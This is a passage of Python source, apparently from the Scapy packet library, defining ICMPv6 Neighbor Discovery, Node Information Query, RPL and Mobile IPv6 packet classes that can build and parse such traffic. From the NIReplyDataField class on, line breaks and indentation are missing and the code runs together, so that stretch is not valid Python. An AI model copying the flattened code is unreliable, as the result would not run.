                   BitField("S", 0, 1),
                   BitField("O", 1, 1),
                   XBitField("res", 0, 29),
                   IP6Field("tgt", "::")]
    overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}}

    def mysummary(self):
        return self.sprintf("%name% (tgt: %tgt%)")

    def hashret(self):
        return bytes_encode(self.tgt) + self.payload.hashret()

    def answers(self, other):
        return isinstance(other, ICMPv6ND_NS) and self.tgt == other.tgt

# associated possible options : target link-layer option, Redirected header


class ICMPv6ND_Redirect(_ICMPv6NDGuessPayload, _ICMPv6, Packet):
    """Redirect message (type 137)."""
    name = "ICMPv6 Neighbor Discovery - Redirect"
    fields_desc = [ByteEnumField("type", 137, icmp6types),
                   ByteField("code", 0),
                   XShortField("cksum", None),
                   XIntField("res", 0),
                   IP6Field("tgt", "::"),
                   IP6Field("dst", "::")]
    overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}}


# ICMPv6 Inverse Neighbor Discovery (RFC 3122)

class ICMPv6NDOptSrcAddrList(_ICMPv6NDGuessPayload, Packet):
    """IND option 9: source address list."""
    name = "ICMPv6 Inverse Neighbor Discovery Option - Source Address List"
    fields_desc = [ByteField("type", 9),
                   FieldLenField("len", None, count_of="addrlist", fmt="B",
                                 adjust=lambda pkt, x: 2 * x + 1),
                   StrFixedLenField("res", b"\x00" * 6, 6),
                   IP6ListField("addrlist", [],
                                length_from=lambda pkt: 8 * (pkt.len - 1))]


class ICMPv6NDOptTgtAddrList(ICMPv6NDOptSrcAddrList):
    """IND option 10: target address list."""
    name = "ICMPv6 Inverse Neighbor Discovery Option - Target Address List"
    type = 10


# RFC3122
# Required options : source lladdr and target lladdr
# Other valid options : source address list, MTU
# - As stated in the document, it would be nice to take the L2 address
#   requested in the mandatory target lladdr option and use it as the
#   Ethernet destination address when none is given
# - it does not seem very practical if the user has to provide every
#   option.
#   Ether() must use the target lladdr as destination
class ICMPv6ND_INDSol(_ICMPv6NDGuessPayload, _ICMPv6):
    """Inverse Neighbor Discovery Solicitation (RFC 3122, type 141)."""
    name = "ICMPv6 Inverse Neighbor Discovery Solicitation"
    fields_desc = [ByteEnumField("type", 141, icmp6types),
                   ByteField("code", 0),
                   XShortField("cksum", None),
                   XIntField("reserved", 0)]
    overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}}

# Options requises : target lladdr, target address list
# Autres options valides : MTU


class ICMPv6ND_INDAdv(_ICMPv6NDGuessPayload, _ICMPv6):
    """Inverse Neighbor Discovery Advertisement (RFC 3122, type 142)."""
    name = "ICMPv6 Inverse Neighbor Discovery Advertisement"
    fields_desc = [ByteEnumField("type", 142, icmp6types),
                   ByteField("code", 0),
                   XShortField("cksum", None),
                   XIntField("reserved", 0)]
    overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}}


###############################################################################
# ICMPv6 Node Information Queries (RFC 4620)
###############################################################################

# [ ] Add automatic destination address computation using computeNIGroupAddr
#     in IPv6 class (Scapy6 modification when integrated) if :
#     - it is not provided
#     - upper layer is ICMPv6NIQueryName() with a valid value
# [ ] Try to be liberal in what we accept as internal values for _explicit_
#     DNS elements provided by users. Any string should be considered
#     valid and kept like it has been provided. At the moment, i2repr() will
#     crash on many inputs
# [ ] Do the documentation
# [ ] Add regression tests
# [ ] Perform test against real machines (NOOP reply is proof of implementation).  # noqa: E501
# [ ] Check if there are differences between different stacks. Among *BSD,
#     with others.
# [ ] Deal with flags in a consistent way.
# [ ] Implement compression in names2dnsrepr() and decompresiion in
#     dnsrepr2names(). Should be deactivable.

icmp6_niqtypes = {0: "NOOP",
                  2: "Node Name",
                  3: "IPv6 Address",
                  4: "IPv4 Address"}


class _ICMPv6NIHashret:
    # Pair NI queries/replies on the 8-byte nonce.
    def hashret(self):
        return bytes_encode(self.nonce)


class _ICMPv6NIAnswers:
    # A reply answers the query carrying the same nonce.
    def answers(self, other):
        return self.nonce == other.nonce


# Buggy; always returns the same value during a session
class NonceField(StrFixedLenField):
    """8-byte nonce; a random default is drawn once at field creation."""
    def __init__(self, name, default=None):
        StrFixedLenField.__init__(self, name, default, 8)
        if default is None:
            self.default = self.randval()


@conf.commands.register
def computeNIGroupAddr(name):
    """Compute the NI group Address. Can take a FQDN as input parameter"""
    # RFC 4620 sect. 5: group address is derived from the MD5 hash of the
    # first label of the (lowercased) name, length-prefixed.
    name = name.lower().split(".")[0]
    record = chr(len(name)) + name
    h = md5(record.encode("utf8"))
    h = h.digest()
    # BUGFIX: "%2x" pads with SPACES for bytes < 0x10, yielding an invalid
    # IPv6 literal (e.g. "ff02::2: 3 7:..."); "%02x" zero-pads correctly.
    addr = "ff02::2:%02x%02x:%02x%02x" % struct.unpack("BBBB", h[:4])
    return addr
# Note : I merged getfield() and m2i(). m2i() should not be called
#        directly anyway. Same remark for addfield() and i2m()
#
# -- arno

# "The type of information present in the Data field of a query is
#  declared by the ICMP Code, whereas the type of information in a
#  Reply is determined by the Qtype"


def names2dnsrepr(x):
    """
    Take as input a list of DNS names or a single DNS name
    and encode it in DNS format (with possible compression)
    If a string that is already a DNS name in DNS format
    is passed, it is returned unmodified. Result is a string.
    !!!  At the moment, compression is not implemented  !!!
    """
    if isinstance(x, bytes):
        if x and x[-1:] == b'\x00':  # stupid heuristic
            return x
        x = [x]

    res = []
    for n in x:
        termin = b"\x00"
        if n.count(b'.') == 0:  # single-component gets one more
            termin += b'\x00'
        n = b"".join(chb(len(y)) + y for y in n.split(b'.')) + termin
        res.append(n)
    return b"".join(res)


def dnsrepr2names(x):
    """
    Take as input a DNS encoded string (possibly compressed)
    and returns a list of DNS names contained in it.
    If provided string is already in printable format
    (does not end with a null character, a one element list
    is returned). Result is a list.
    """
    res = []
    cur = b""
    while x:
        tmp_len = orb(x[0])
        x = x[1:]
        if not tmp_len:
            if cur and cur[-1:] == b'.':
                cur = cur[:-1]
            res.append(cur)
            cur = b""
            if x and orb(x[0]) == 0:  # single component
                x = x[1:]
            continue
        if tmp_len & 0xc0:  # XXX TODO : work on that -- arno
            raise Exception("DNS message can't be compressed at this point!")
        cur += x[:tmp_len] + b"."
        x = x[tmp_len:]
    return res


class NIQueryDataField(StrField):
    """Data field of an NI query.

    Internal representation is a (type, value) pair:
    0 = IPv6 address, 1 = DNS-encoded name, 2 = IPv4 address.
    The type is guessed from the user-provided value in h2i().
    """
    def __init__(self, name, default):
        StrField.__init__(self, name, default)

    def i2h(self, pkt, x):
        if x is None:
            return x
        t, val = x
        if t == 1:
            val = dnsrepr2names(val)[0]
        return val

    def h2i(self, pkt, x):
        # BUGFIX: was `if x is tuple and ...`, which compares x against the
        # type object itself and is always False — already-typed (t, val)
        # tuples then fell through and crashed in names2dnsrepr().
        if isinstance(x, tuple) and isinstance(x[0], int):
            return x

        # Try IPv6
        try:
            inet_pton(socket.AF_INET6, x.decode())
            return (0, x.decode())
        except Exception:
            pass
        # Try IPv4
        try:
            inet_pton(socket.AF_INET, x.decode())
            return (2, x.decode())
        except Exception:
            pass
        # Try DNS
        if x is None:
            x = b""
        x = names2dnsrepr(x)
        return (1, x)

    def i2repr(self, pkt, x):
        t, val = x
        if t == 1:  # DNS Name
            # we don't use dnsrepr2names() to deal with
            # possible weird data extracted info
            res = []
            while val:
                tmp_len = orb(val[0])
                val = val[1:]
                if tmp_len == 0:
                    break
                res.append(plain_str(val[:tmp_len]) + ".")
                val = val[tmp_len:]
            tmp = "".join(res)
            if tmp and tmp[-1] == '.':
                tmp = tmp[:-1]
            return tmp
        return repr(val)

    def getfield(self, pkt, s):
        qtype = getattr(pkt, "qtype")
        if qtype == 0:  # NOOP
            return s, (0, b"")
        else:
            code = getattr(pkt, "code")
            if code == 0:   # IPv6 Addr
                return s[16:], (0, inet_ntop(socket.AF_INET6, s[:16]))
            elif code == 2:  # IPv4 Addr
                return s[4:], (2, inet_ntop(socket.AF_INET, s[:4]))
            else:           # Name or Unknown
                return b"", (1, s)

    def addfield(self, pkt, s, val):
        if ((isinstance(val, tuple) and val[1] is None) or
                val is None):
            val = (1, b"")
        t = val[0]
        if t == 1:
            return s + val[1]
        elif t == 0:
            return s + inet_pton(socket.AF_INET6, val[1])
        else:
            return s + inet_pton(socket.AF_INET, val[1])


class NIQueryCodeField(ByteEnumField):
    """Derive the ICMP code (0/1/2) from the type tag stored in 'data'."""
    def i2m(self, pkt, x):
        if x is None:
            d = pkt.getfieldval("data")
            if d is None:
                return 1
            elif d[0] == 0:  # IPv6 address
                return 0
            elif d[0] == 1:  # Name
                return 1
            elif d[0] == 2:  # IPv4 address
                return 2
            else:
                return 1
        return x


_niquery_code = {0: "IPv6 Query", 1: "Name Query", 2: "IPv4 Query"}

# _niquery_flags = {  2: "All unicast addresses", 4: "IPv4 addresses",
#                     8: "Link-local addresses", 16: "Site-local addresses",
#                    32: "Global addresses" }
# "This NI type has no defined flags and never has a Data Field". Used
# to know if the destination is up and implements NI protocol.
class ICMPv6NIQueryNOOP(_ICMPv6NIHashret, _ICMPv6):
    """NI NOOP Query (RFC 4620, type 139, qtype 0)."""
    name = "ICMPv6 Node Information Query - NOOP Query"
    fields_desc = [ByteEnumField("type", 139, icmp6types),
                   NIQueryCodeField("code", None, _niquery_code),
                   XShortField("cksum", None),
                   ShortEnumField("qtype", 0, icmp6_niqtypes),
                   BitField("unused", 0, 10),
                   FlagsField("flags", 0, 6, "TACLSG"),
                   NonceField("nonce", None),
                   NIQueryDataField("data", None)]


class ICMPv6NIQueryName(ICMPv6NIQueryNOOP):
    """NI Name Query (qtype 2): ask the peer for its node name."""
    name = "ICMPv6 Node Information Query - IPv6 Name Query"
    qtype = 2


# We ask for the IPv6 address of the peer
class ICMPv6NIQueryIPv6(ICMPv6NIQueryNOOP):
    """NI IPv6 Address Query (qtype 3)."""
    name = "ICMPv6 Node Information Query - IPv6 Address Query"
    qtype = 3
    flags = 0x3E


class ICMPv6NIQueryIPv4(ICMPv6NIQueryNOOP):
    """NI IPv4 Address Query (qtype 4)."""
    name = "ICMPv6 Node Information Query - IPv4 Address Query"
    qtype = 4


_nireply_code = {0: "Successful Reply",
                 1: "Response Refusal",
                 3: "Unknown query type"}

_nireply_flags = {1: "Reply set incomplete",
                  2: "All unicast addresses",
                  4: "IPv4 addresses",
                  8: "Link-local addresses",
                  16: "Site-local addresses",
                  32: "Global addresses"}

# Internal repr is one of those :
# (0, "some string") : unknown qtype value are mapped to that one
# (3, [ (ttl, ip6), ... ])
# (4, [ (ttl, ip4), ... ])
# (2, [ttl, dns_names]) : dns_names is one string that contains
#     all the DNS names. Internally it is kept ready to be sent
#     (undissected). i2repr() decode it for user. This is to
#     make build after dissection bijective.
#
# I also merged getfield() and m2i(), and addfield() and i2m().
class NIReplyDataField(StrField): def i2h(self, pkt, x): if x is None: return x t, val = x if t == 2: ttl, dnsnames = val val = [ttl] + dnsrepr2names(dnsnames) return val def h2i(self, pkt, x): qtype = 0 # We will decode it as string if not # overridden through 'qtype' in pkt # No user hint, let's use 'qtype' value for that purpose if not isinstance(x, tuple): if pkt is not None: qtype = pkt.qtype else: qtype = x[0] x = x[1] # From that point on, x is the value (second element of the tuple) if qtype == 2: # DNS name if isinstance(x, (str, bytes)): # listify the string x = [x] if isinstance(x, list): x = [val.encode() if isinstance(val, str) else val for val in x] # noqa: E501 if x and isinstance(x[0], six.integer_types): ttl = x[0] names = x[1:] else: ttl = 0 names = x return (2, [ttl, names2dnsrepr(names)]) elif qtype in [3, 4]: # IPv4 or IPv6 addr if not isinstance(x, list): x = [x] # User directly provided an IP, instead of list def fixvalue(x): # List elements are not tuples, user probably # omitted ttl value : we will use 0 instead if not isinstance(x, tuple): x = (0, x) # Decode bytes if six.PY3 and isinstance(x[1], bytes): x = (x[0], x[1].decode()) return x return (qtype, [fixvalue(d) for d in x]) return (qtype, x) def addfield(self, pkt, s, val): t, tmp = val if tmp is None: tmp = b"" if t == 2: ttl, dnsstr = tmp return s + struct.pack("!I", ttl) + dnsstr elif t == 3: return s + b"".join(map(lambda x_y1: struct.pack("!I", x_y1[0]) + inet_pton(socket.AF_INET6, x_y1[1]), tmp)) # noqa: E501 elif t == 4: return s + b"".join(map(lambda x_y2: struct.pack("!I", x_y2[0]) + inet_pton(socket.AF_INET, x_y2[1]), tmp)) # noqa: E501 else: return s + tmp def getfield(self, pkt, s): code = getattr(pkt, "code") if code != 0: return s, (0, b"") qtype = getattr(pkt, "qtype") if qtype == 0: # NOOP return s, (0, b"") elif qtype == 2: if len(s) < 4: return s, (0, b"") ttl = struct.unpack("!I", s[:4])[0] return b"", (2, [ttl, s[4:]]) elif qtype == 3: # IPv6 addresses with TTLs # 
XXX TODO : get the real length res = [] while len(s) >= 20: # 4 + 16 ttl = struct.unpack("!I", s[:4])[0] ip = inet_ntop(socket.AF_INET6, s[4:20]) res.append((ttl, ip)) s = s[20:] return s, (3, res) elif qtype == 4: # IPv4 addresses with TTLs # XXX TODO : get the real length res = [] while len(s) >= 8: # 4 + 4 ttl = struct.unpack("!I", s[:4])[0] ip = inet_ntop(socket.AF_INET, s[4:8]) res.append((ttl, ip)) s = s[8:] return s, (4, res) else: # XXX TODO : implement me and deal with real length return b"", (0, s) def i2repr(self, pkt, x): if x is None: return "[]" if isinstance(x, tuple) and len(x) == 2: t, val = x if t == 2: # DNS names ttl, tmp_len = val tmp_len = dnsrepr2names(tmp_len) names_list = (plain_str(name) for name in tmp_len) return "ttl:%d %s" % (ttl, ",".join(names_list)) elif t == 3 or t == 4: return "[ %s ]" % (", ".join(map(lambda x_y: "(%d, %s)" % (x_y[0], x_y[1]), val))) # noqa: E501 return repr(val) return repr(x) # XXX should not happen # By default, sent responses have code set to 0 (successful) class ICMPv6NIReplyNOOP(_ICMPv6NIAnswers, _ICMPv6NIHashret, _ICMPv6): name = "ICMPv6 Node Information Reply - NOOP Reply" fields_desc = [ByteEnumField("type", 140, icmp6types), ByteEnumField("code", 0, _nireply_code), XShortField("cksum", None), ShortEnumField("qtype", 0, icmp6_niqtypes), BitField("unused", 0, 10), FlagsField("flags", 0, 6, "TACLSG"), NonceField("nonce", None), NIReplyDataField("data", None)] class ICMPv6NIReplyName(ICMPv6NIReplyNOOP): name = "ICMPv6 Node Information Reply - Node Names" qtype = 2 class ICMPv6NIReplyIPv6(ICMPv6NIReplyNOOP): name = "ICMPv6 Node Information Reply - IPv6 addresses" qtype = 3 class ICMPv6NIReplyIPv4(ICMPv6NIReplyNOOP): name = "ICMPv6 Node Information Reply - IPv4 addresses" qtype = 4 class ICMPv6NIReplyRefuse(ICMPv6NIReplyNOOP): name = "ICMPv6 Node Information Reply - Responder refuses to supply answer" code = 1 class ICMPv6NIReplyUnknown(ICMPv6NIReplyNOOP): name = "ICMPv6 Node Information Reply - Qtype unknown 
to the responder" code = 2 def _niquery_guesser(p): cls = conf.raw_layer type = orb(p[0]) if type == 139: # Node Info Query specific stuff if len(p) > 6: qtype, = struct.unpack("!H", p[4:6]) cls = {0: ICMPv6NIQueryNOOP, 2: ICMPv6NIQueryName, 3: ICMPv6NIQueryIPv6, 4: ICMPv6NIQueryIPv4}.get(qtype, conf.raw_layer) elif type == 140: # Node Info Reply specific stuff code = orb(p[1]) if code == 0: if len(p) > 6: qtype, = struct.unpack("!H", p[4:6]) cls = {2: ICMPv6NIReplyName, 3: ICMPv6NIReplyIPv6, 4: ICMPv6NIReplyIPv4}.get(qtype, ICMPv6NIReplyNOOP) elif code == 1: cls = ICMPv6NIReplyRefuse elif code == 2: cls = ICMPv6NIReplyUnknown return cls ############################################################################# ############################################################################# # Routing Protocol for Low Power and Lossy Networks RPL (RFC 6550) # ############################################################################# ############################################################################# # https://www.iana.org/assignments/rpl/rpl.xhtml#control-codes rplcodes = {0: "DIS", 1: "DIO", 2: "DAO", 3: "DAO-ACK", # 4: "P2P-DRO", # 5: "P2P-DRO-ACK", # 6: "Measurement", 7: "DCO", 8: "DCO-ACK"} class ICMPv6RPL(_ICMPv6): # RFC 6550 name = 'RPL' fields_desc = [ByteEnumField("type", 155, icmp6types), ByteEnumField("code", 0, rplcodes), XShortField("cksum", None)] overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1a"}} ############################################################################# ############################################################################# # Mobile IPv6 (RFC 3775) and Nemo (RFC 3963) # ############################################################################# ############################################################################# # Mobile IPv6 ICMPv6 related classes class ICMPv6HAADRequest(_ICMPv6): name = 'ICMPv6 Home Agent Address Discovery Request' fields_desc = [ByteEnumField("type", 144, icmp6types), 
ByteField("code", 0), XShortField("cksum", None), XShortField("id", None), BitEnumField("R", 1, 1, {1: 'MR'}), XBitField("res", 0, 15)] def hashret(self): return struct.pack("!H", self.id) + self.payload.hashret() class ICMPv6HAADReply(_ICMPv6): name = 'ICMPv6 Home Agent Address Discovery Reply' fields_desc = [ByteEnumField("type", 145, icmp6types), ByteField("code", 0), XShortField("cksum", None), XShortField("id", None), BitEnumField("R", 1, 1, {1: 'MR'}), XBitField("res", 0, 15), IP6ListField('addresses', None)] def hashret(self): return struct.pack("!H", self.id) + self.payload.hashret() def answers(self, other): if not isinstance(other, ICMPv6HAADRequest): return 0 return self.id == other.id class ICMPv6MPSol(_ICMPv6): name = 'ICMPv6 Mobile Prefix Solicitation' fields_desc = [ByteEnumField("type", 146, icmp6types), ByteField("code", 0), XShortField("cksum", None), XShortField("id", None), XShortField("res", 0)] def _hashret(self): return struct.pack("!H", self.id) class ICMPv6MPAdv(_ICMPv6NDGuessPayload, _ICMPv6): name = 'ICMPv6 Mobile Prefix Advertisement' fields_desc = [ByteEnumField("type", 147, icmp6types), ByteField("code", 0), XShortField("cksum", None), XShortField("id", None), BitEnumField("flags", 2, 2, {2: 'M', 1: 'O'}), XBitField("res", 0, 14)] def hashret(self): return struct.pack("!H", self.id) def answers(self, other): return isinstance(other, ICMPv6MPSol) # Mobile IPv6 Options classes _mobopttypes = {2: "Binding Refresh Advice", 3: "Alternate Care-of Address", 4: "Nonce Indices", 5: "Binding Authorization Data", 6: "Mobile Network Prefix (RFC3963)", 7: "Link-Layer Address (RFC4068)", 8: "Mobile Node Identifier (RFC4283)", 9: "Mobility Message Authentication (RFC4285)", 10: "Replay Protection (RFC4285)", 11: "CGA Parameters Request (RFC4866)", 12: "CGA Parameters (RFC4866)", 13: "Signature (RFC4866)", 14: "Home Keygen Token (RFC4866)", 15: "Care-of Test Init (RFC4866)", 16: "Care-of Test (RFC4866)"} class _MIP6OptAlign(Packet): """ Mobile IPv6 
options have alignment requirements of the form x*n+y. This class is inherited by all MIPv6 options to help in computing the required Padding for that option, i.e. the need for a Pad1 or PadN option before it. They only need to provide x and y as class parameters. (x=0 and y=0 are used when no alignment is required)""" __slots__ = ["x", "y"] def alignment_delta(self, curpos): x = self.x y = self.y if x == 0 and y == 0: return 0 delta = x * ((curpos - y + x - 1) // x) + y - curpos return delta def extract_padding(self, p): return b"", p class MIP6OptBRAdvice(_MIP6OptAlign): name = 'Mobile IPv6 Option - Binding Refresh Advice' fields_desc = [ByteEnumField('otype', 2, _mobopttypes), ByteField('olen', 2), ShortField('rinter', 0)] x = 2 y = 0 # alignment requirement: 2n class MIP6OptAltCoA(_MIP6OptAlign): name = 'MIPv6 Option - Alternate Care-of Address' fields_desc = [ByteEnumField('otype', 3, _mobopttypes), ByteField('olen', 16), IP6Field("acoa", "::")] x = 8 y = 6 # alignment requirement: 8n+6 class MIP6OptNonceIndices(_MIP6OptAlign): name = 'MIPv6 Option - Nonce Indices' fields_desc = [ByteEnumField('otype', 4, _mobopttypes), ByteField('olen', 16), ShortField('hni', 0), ShortField('coni', 0)] x = 2 y = 0 # alignment requirement: 2n class MIP6OptBindingAuthData(_MIP6OptAlign): name = 'MIPv6 Option - Binding Authorization Data' fields_desc = [ByteEnumField('otype', 5, _mobopttypes), ByteField('olen', 16), BitField('authenticator', 0, 96)] x = 8 y = 2 # alignment requirement: 8n+2 class MIP6OptMobNetPrefix(_MIP6OptAlign): # NEMO - RFC 3963 name = 'NEMO Option - Mobile Network Prefix' fields_desc = [ByteEnumField("otype", 6, _mobopttypes), ByteField("olen", 18), ByteField("reserved", 0), ByteField("plen", 64), IP6Field("prefix", "::")] x = 8 y = 4 # alignment requirement: 8n+4 class MIP6OptLLAddr(_MIP6OptAlign): # Sect 6.4.4 of RFC 4068 name = "MIPv6 Option - Link-Layer Address (MH-LLA)" fields_desc = [ByteEnumField("otype", 7, _mobopttypes), ByteField("olen", 7), 
ByteEnumField("ocode", 2, _rfc4068_lla_optcode), ByteField("pad", 0), MACField("lla", ETHER_ANY)] # Only support ethernet x = 0 y = 0 # alignment requirement: none class MIP6OptMNID(_MIP6OptAlign): # RFC 4283 name = "MIPv6 Option - Mobile Node Identifier" fields_desc = [ByteEnumField("otype", 8, _mobopttypes), FieldLenField("olen", None, length_of="id", fmt="B", adjust=lambda pkt, x: x + 1), ByteEnumField("subtype", 1, {1: "NAI"}), StrLenField("id", "", length_from=lambda pkt: pkt.olen - 1)] x = 0 y = 0 # alignment requirement: none # We only support decoding and basic build. Automatic HMAC computation is # too much work for our current needs. It is left to the user (I mean ... # you). --arno class MIP6OptMsgAuth(_MIP6OptAlign): # RFC 4285 (Sect. 5) name = "MIPv6 Option - Mobility Message Authentication" fields_desc = [ByteEnumField("otype", 9, _mobopttypes), FieldLenField("olen", None, length_of="authdata", fmt="B", adjust=lambda pkt, x: x + 5), ByteEnumField("subtype", 1, {1: "MN-HA authentication mobility option", # noqa: E501 2: "MN-AAA authentication mobility option"}), # noqa: E501 IntField("mspi", None), StrLenField("authdata", "A" * 12, length_from=lambda pkt: pkt.olen - 5)] x = 4 y = 1 # alignment requirement: 4n+1 # Extracted from RFC 1305 (NTP) : # NTP timestamps are represented as a 64-bit unsigned fixed-point number, # in seconds relative to 0h on 1 January 1900. The integer part is in the # first 32 bits and the fraction part in the last 32 bits. class NTPTimestampField(LongField): def i2repr(self, pkt, x): if x < ((50 * 31536000) << 32): return "Some date a few decades ago (%d)" % x # delta from epoch (= (1900, 1, 1, 0, 0, 0, 5, 1, 0)) to # January 1st 1970 : delta = -2209075761 i = int(x >> 32) j = float(x & 0xffffffff) * 2.0**-32 res = i + j + delta t = strftime("%a, %d %b %Y %H:%M:%S +0000", gmtime(res)) return "%s (%d)" % (t, x) class MIP6OptReplayProtection(_MIP6OptAlign): # RFC 4285 (Sect. 
6) name = "MIPv6 option - Replay Protection" fields_desc = [ByteEnumField("otype", 10, _mobopttypes), ByteField("olen", 8), NTPTimestampField("timestamp", 0)] x = 8 y = 2 # alignment requirement: 8n+2 class MIP6OptCGAParamsReq(_MIP6OptAlign): # RFC 4866 (Sect. 5.6) name = "MIPv6 option - CGA Parameters Request" fields_desc = [ByteEnumField("otype", 11, _mobopttypes), ByteField("olen", 0)] x = 0 y = 0 # alignment requirement: none # XXX TODO: deal with CGA param fragmentation and build of defragmented # XXX version. Passing of a big CGAParam structure should be # XXX simplified. Make it hold packets, by the way --arno class MIP6OptCGAParams(_MIP6OptAlign): # RFC 4866 (Sect. 5.1) name = "MIPv6 option - CGA Parameters" fields_desc = [ByteEnumField("otype", 12, _mobopttypes), FieldLenField("olen", None, length_of="cgaparams", fmt="B"), StrLenField("cgaparams", "", length_from=lambda pkt: pkt.olen)] x = 0 y = 0 # alignment requirement: none class MIP6OptSignature(_MIP6OptAlign): # RFC 4866 (Sect. 5.2) name = "MIPv6 option - Signature" fields_desc = [ByteEnumField("otype", 13, _mobopttypes), FieldLenField("olen", None, length_of="sig", fmt="B"), StrLenField("sig", "", length_from=lambda pkt: pkt.olen)] x = 0 y = 0 # alignment requirement: none class MIP6OptHomeKeygenToken(_MIP6OptAlign): # RFC 4866 (Sect. 5.3) name = "MIPv6 option - Home Keygen Token" fields_desc = [ByteEnumField("otype", 14, _mobopttypes), FieldLenField("olen", None, length_of="hkt", fmt="B"), StrLenField("hkt", "", length_from=lambda pkt: pkt.olen)] x = 0 y = 0 # alignment requirement: none class MIP6OptCareOfTestInit(_MIP6OptAlign): # RFC 4866 (Sect. 5.4) name = "MIPv6 option - Care-of Test Init" fields_desc = [ByteEnumField("otype", 15, _mobopttypes), ByteField("olen", 0)] x = 0 y = 0 # alignment requirement: none class MIP6OptCareOfTest(_MIP6OptAlign): # RFC 4866 (Sect. 
5.5) name = "MIPv6 option - Care-of Test" fields_desc = [ByteEnumField("otype", 16, _mobopttypes), FieldLenField("olen", None, length_of="cokt", fmt="B"), StrLenField("cokt", b'\x00' * 8, length_from=lambda pkt: pkt.olen)] x = 0 y = 0 # alignment requirement: none class MIP6OptUnknown(_MIP6OptAlign): name = 'Scapy6 - Unknown Mobility Option' fields_desc = [ByteEnumField("otype", 6, _mobopttypes), FieldLenField("olen", None, length_of="odata", fmt="B"), StrLenField("odata", "", length_from=lambda pkt: pkt.olen)] x = 0 y = 0 # alignment requirement: none @classmethod def dispatch_hook(cls, _pkt=None, *_, **kargs): if _pkt: o = orb(_pkt[0]) # Option type if o in moboptcls: return moboptcls[o] return cls moboptcls = {0: Pad1, 1: PadN, 2: MIP6OptBRAdvice, 3: MIP6OptAltCoA, 4: MIP6OptNonceIndices, 5: MIP6OptBindingAuthData, 6: MIP6OptMobNetPrefix, 7: MIP6OptLLAddr, 8: MIP6OptMNID, 9: MIP6OptMsgAuth, 10: MIP6OptReplayProtection, 11: MIP6OptCGAParamsReq, 12: MIP6OptCGAParams, 13: MIP6OptSignature, 14: MIP6OptHomeKeygenToken, 15: MIP6OptCareOfTestInit, 16: MIP6OptCareOfTest} # Main Mobile IPv6 Classes mhtypes = {0: 'BRR', 1: 'HoTI', 2: 'CoTI', 3: 'HoT', 4: 'CoT', 5: 'BU', 6: 'BA', 7: 'BE', 8: 'Fast BU', 9: 'Fast BA', 10: 'Fast NA'} # From http://www.iana.org/assignments/mobility-parameters bastatus = {0: 'Binding Update accepted', 1: 'Accepted but prefix discovery necessary', 128: 'Reason unspecified', 129: 'Administratively prohibited', 130: 'Insufficient resources', 131: 'Home registration not supported', 132: 'Not home subnet', 133: 'Not home agent for this mobile node', 134: 'Duplicate Address Detection failed', 135: 'Sequence number out of window', 136: 'Expired home nonce index', 137: 'Expired care-of nonce index', 138: 'Expired nonces', 139: 'Registration type change disallowed', 140: 'Mobile Router Operation not permitted', 141: 'Invalid Prefix', 142: 'Not Authorized for Prefix', 143: 'Forwarding Setup failed (prefixes missing)', 144: 'MIPV6-ID-MISMATCH', 145: 
'MIPV6-MESG-ID-REQD', 146: 'MIPV6-AUTH-FAIL', 147: 'Permanent home keygen token unavailable', 148: 'CGA and signature verification failed', 149: 'Permanent home keygen token exists', 150: 'Non-null home nonce index expected'} class _MobilityHeader(Packet): name = 'Dummy IPv6 Mobility Header' overload_fields = {IPv6: {"nh": 135}} def post_build(self, p, pay): p += pay tmp_len = self.len if self.len is None: tmp_len = (len(p) - 8) // 8 p = p[:1] + struct.pack("B", tmp_len) + p[2:] if self.cksum is None: cksum = in6_chksum(135, self.underlayer, p) else: cksum = self.cksum p = p[:4] + struct.pack("!H", cksum) + p[6:] return p class MIP6MH_Generic(_MobilityHeader): # Mainly for decoding of unknown msg name = "IPv6 Mobility Header - Generic Message" fields_desc = [ByteEnumField("nh", 59, ipv6nh), ByteField("len", None), ByteEnumField("mhtype", None, mhtypes), ByteField("res", None), XShortField("cksum", None), StrLenField("msg", b"\x00" * 2, length_from=lambda pkt: 8 * pkt.len - 6)] class MIP6MH_BRR(_MobilityHeader): name = "IPv6 Mobility Header - Binding Refresh Request" fields_desc = [ByteEnumField("nh", 59, ipv6nh), ByteField("len", None), ByteEnumField("mhtype", 0, mhtypes), ByteField("res", None), XShortField("cksum", None), ShortField("res2", None), _PhantomAutoPadField("autopad", 1), # autopad activated by default # noqa: E501 _OptionsField("options", [], MIP6OptUnknown, 8, length_from=lambda pkt: 8 * pkt.len)] overload_fields = {IPv6: {"nh": 135}} def hashret(self): # Hack: BRR, BU and BA have the same hashret that returns the same # value b"\x00\x08\x09" (concatenation of mhtypes). This is # because we need match BA with BU and BU with BRR. 
--arno return b"\x00\x08\x09" class MIP6MH_HoTI(_MobilityHeader): name = "IPv6 Mobility Header - Home Test Init" fields_desc = [ByteEnumField("nh", 59, ipv6nh), ByteField("len", None), ByteEnumField("mhtype", 1, mhtypes), ByteField("res", None), XShortField("cksum", None), StrFixedLenField("reserved", b"\x00" * 2, 2), StrFixedLenField("cookie", b"\x00" * 8, 8), _PhantomAutoPadField("autopad", 1), # autopad activated by default # noqa: E501 _OptionsField("options", [], MIP6OptUnknown, 16, length_from=lambda pkt: 8 * (pkt.len - 1))] overload_fields = {IPv6: {"nh": 135}} def hashret(self): return bytes_encode(self.cookie) class MIP6MH_CoTI(MIP6MH_HoTI): name = "IPv6 Mobility Header - Care-of Test Init" mhtype = 2 def hashret(self): return bytes_encode(self.cookie) class MIP6MH_HoT(_MobilityHeader): name = "IPv6 Mobility Header - Home Test" fields_desc = [ByteEnumField("nh", 59, ipv6nh), ByteField("len", None), ByteEnumField("mhtype", 3, mhtypes), ByteField("res", None), XShortField("cksum", None), ShortField("index", None), StrFixedLenField("cookie", b"\x00" * 8, 8), StrFixedLenField("token", b"\x00" * 8, 8), _PhantomAutoPadField("autopad", 1), # autopad activated by default # noqa: E501 _OptionsField("options", [], MIP6OptUnknown, 24, length_from=lambda pkt: 8 * (pkt.len - 2))] overload_fields = {IPv6: {"nh": 135}} def hashret(self): return bytes_encode(self.cookie) def answers(self, other): if (isinstance(other, MIP6MH_HoTI) and self.cookie == other.cookie): return 1 return 0 class MIP6MH_CoT(MIP6MH_HoT): name = "IPv6 Mobility Header - Care-of Test" mhtype = 4 def hashret(self): return bytes_encode(self.cookie) def answers(self, other): if (isinstance(other, MIP6MH_CoTI) and self.cookie == other.cookie): return 1 return 0 class LifetimeField(ShortField): def 